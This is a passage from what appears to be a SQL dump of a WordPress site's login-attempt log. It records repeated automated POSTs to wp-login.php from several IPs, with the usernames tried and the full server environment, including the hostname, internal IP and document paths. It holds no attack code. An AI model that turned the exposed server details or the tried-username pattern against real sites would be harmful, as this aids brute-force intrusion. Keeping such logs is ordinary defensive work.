8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851890.3348639;s:12:\"REQUEST_TIME\";i:1746851890;}}','35.154.1.88',1,'2025-05-10 10:08:13','2025-05-11 10:08:13'),(95264,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61543\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851890.3355391;s:12:\"REQUEST_TIME\";i:1746851890;}}','35.154.1.88',1,'2025-05-10 10:08:13','2025-05-11 10:08:13'),(95265,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61539\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851890.3372991;s:12:\"REQUEST_TIME\";i:1746851890;}}','35.154.1.88',1,'2025-05-10 10:08:13','2025-05-11 10:08:13'),(95266,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61545\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851892.1554379;s:12:\"REQUEST_TIME\";i:1746851892;}}','35.154.1.88',1,'2025-05-10 10:08:13','2025-05-11 10:08:13'),(95267,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61541\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851892.1549439;s:12:\"REQUEST_TIME\";i:1746851892;}}','35.154.1.88',1,'2025-05-10 10:08:13','2025-05-11 10:08:13'),(95268,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40574\";s:11:\"REMOTE_ADDR\";s:13:\"95.217.147.99\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851977.9891241;s:12:\"REQUEST_TIME\";i:1746851977;}}','95.217.147.99',0,'2025-05-10 10:09:39','1970-01-01 00:00:00'),(95269,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37000\";s:11:\"REMOTE_ADDR\";s:14:\"203.26.151.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746852599.4948499;s:12:\"REQUEST_TIME\";i:1746852599;}}','203.26.151.246',0,'2025-05-10 10:20:01','1970-01-01 00:00:00'),(95270,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59568\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746853206.1750009;s:12:\"REQUEST_TIME\";i:1746853206;}}','66.29.141.17',0,'2025-05-10 10:30:07','1970-01-01 00:00:00'),(95271,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49490\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746853809.6827791;s:12:\"REQUEST_TIME\";i:1746853809;}}','209.172.2.50',0,'2025-05-10 10:40:11','1970-01-01 00:00:00'),(95272,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38180\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746854421.0648329;s:12:\"REQUEST_TIME\";i:1746854421;}}','198.187.29.183',0,'2025-05-10 10:50:23','1970-01-01 00:00:00'),(95273,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44974\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746855052.897104;s:12:\"REQUEST_TIME\";i:1746855052;}}','209.172.2.50',0,'2025-05-10 11:00:54','1970-01-01 00:00:00'),(95274,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60814\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746855687.231282;s:12:\"REQUEST_TIME\";i:1746855687;}}','66.29.141.17',0,'2025-05-10 11:11:29','1970-01-01 